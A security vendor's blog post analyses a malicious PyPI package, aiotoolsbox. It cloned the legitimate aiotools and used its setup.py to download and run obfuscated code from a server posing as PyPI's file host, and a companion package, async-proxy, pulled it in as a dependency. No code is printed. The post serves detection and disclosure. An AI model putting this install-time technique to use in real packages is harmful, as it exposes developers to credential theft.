Detecting Malicious Packages on PyPI: Malicious package on PyPI use phishing techniques to hide its malicious intent

By, Ori Abramovsky

Highlights:

1. Check Point CloudGuard Spectralops detected a malicious phishing account on PyPI, the leading Python package index.

2. Users installing the account packages were exposed to a malicious actor, probably a PII stealer.

3. Once detected, we alerted PyPI on these packages. Soon after the packages were removed by the PyPI team.

Intro

PyPI (Python Package Index) is the official repository of software packages for the Python programming language. It is a centralised platform where Python developers can find, install, and share open-source Python packages with others. PyPI is operated by the Python Software Foundation (PSF), and is accessible via the pip package installer, which is included with most Python installations. Users can search for packages by name or by keyword, and can download and install packages with a single command. PyPI hosts thousands of open-source Python packages, ranging from libraries for scientific computing and data analysis, to frameworks for web development and machine learning. Anyone can upload a package to PyPI, as long as it meets certain requirements and guidelines set by the PSF. PyPI has become an essential tool for the Python community, enabling developers to easily discover and use third-party packages, and encouraging collaboration and sharing among Python developers worldwide. Many popular Python frameworks and tools, such as Django, Flask, and Pandas, are available on PyPI, along with a vast array of other packages for various purposes, making it a critical resource for developers in the Python ecosystem.

The attack

It is important to note that the malicious actors are not waiting, and we keep seeing new techniques and strategies with which they try to hide their malicious intent (from using Steganography, towards crypto-jackers which hijack the installer system in order to mine crypto currency for their profit). The malicious packages that we’ve detected demonstrate how phishing is another tool in use by attackers to hide their intent. Using our machine learning models we were able to detect these malicious packages on PyPI. While pretending to be async-io related helpers, these packages turned out to be malicious actors; hiddenly downloading and executing obfuscated code as part of their installation process. Moreover, the attacker published a few versions of the very same package with slight modifications, probably iterating towards a version which will be less visible to the ones who hunt for malicious packages on PyPI. Much details of the detected packages are ahead.

The attack in details

The first package which caught our attention was aiotoolsbox; while looking benign at first glance, it turned out to be an exact replica of the legit package aiotools. It’s important to note that while typosquating (using package names which resembles popular benign ones in order to fool users into installing the malicious ones) is quite a common attack on the supply chain world, ident copy of the benign package is a less common practice (for most cases mimicking the package name is just enough) and is in general something we’re more seeing on the phishing world. Such effort can indicate a more sophisticated campaign, taking into account that installers may have a second look at the packages they are about to install (interestingly, similar malicious campaign was previously identified by our machine learning models).

The benign package aiotools next to the malicious aiotoolsbox

Looking into the packages metadata; both share the same author while having a different maintainer. Relying on the fact that according to the PyPI packages publishing protocol the author fields are free text while the maintainer is an authenticated user, the attacker could easily mimic the author field while for the maintainer fields they needed to rely on something else.

The benign package aiotools contributors’ details next to the malicious aiotoolsbox

According to the aiotoolsbox maintainer details, they are PyPI contributors since 2019. Given the fact the only two packages they have were recently published, it’s fair to assume this account was recently breached.

aiotoolsbox PyPI maintainer page

Looking into aiotoolsbox setup code it includes a strange looking snippet which as part of the installation process, downloads a zip from the web, extract, execute and finally deletes its content.

aiotoolsbox setup.py code

The first interesting point here is the fact that the zip is being downloaded from a server which is supposed to be ‘files.pythonhosted.org’. This turns out to be the second phishing layer of the attack as the server tries to hide itself as the official PyPI packages hosting site.

The benign files.pythonhosted.org next to the aiotoolsbox malicious server in use

Another interesting point is the downloaded file name which corresponds to the python version in use, aka for example one using python 3.9 will get a zip named 39.zip. This seems to be another level of phishing obfuscation, making the common user assume this is something legit they are seeing, probably some sort of pip internal flow.

Looking into the downloaded zip it included a pyArmor obfuscated code which makes it difficult to clearly understand its malicious intent. Nevertheless, looking at the downloaded file names it is fair to assume the package is a PII stealer, intending to collect and steal the installer’s secrets. Given the fact this zip was hiddenly downloaded during the installation process we can conclude this is not a benign case.

The downloaded zip contents

The main.py entry script content

Looking back at aiotoolsbox package structure; besides the mentioned setup.py, the rest of the files seem to be taken from the benign aiotools package, making the common user to get the base functionalities they were searching for, not knowing they have just installed a malicious package.

The benign package aiotools files’ structure next to the malicious aiotoolsbox

Searching for aiotoolsbox previous versions we can interestingly notice that it was uploaded a few times with different versions (first 1.4.7 and only then 1.4.5 and 1.4.6).

Searching for aiotoolsbox previous releases

Looking into the difference between those versions turns out they had the very same structure while the only difference was in the setup.py file and more specifically in the server IP they use. Checking the IP details the initial version was a Russian IP while the later one was from Germany. Probably again another level of obfuscation, assuming a Russian IP will be more alarming than a German one.

aiotoolsbox recent version (1.4.6) vs the previous one (1.4.7)

The more recent (1.4.6) IP in use vs the previous one (1.4.7)

Finally looking at the account other package – async-proxy, in its setup.py it mentions aiotoolsbox as its only requirement, making anyone installing it to install the malicious aiotoolsbox as well.

async-proxy setup.py code

Disclosure

We’ve disclosed the account to PyPI and soon after the mentioned packages were removed by the PyPI team.

How CloudGuard Spectral prevents such risk

With supply chain attacks increasing in frequency, it is essential to safeguard yourself by verifying all software ingredients you use, especially those which are not developed by you. At Check Point, our mission is to build a secure development process, equipping developers with the right tools to achieve this. To combat malicious packages leading to supply chain risks, we are vigilantly monitoring PyPI and NPM for malicious entities. After their identification, we inform NPM, prompting their immediate removal. By leveraging CloudGuard Spectral, you can remain safe and alert, enabling you to identify malicious actors quickly.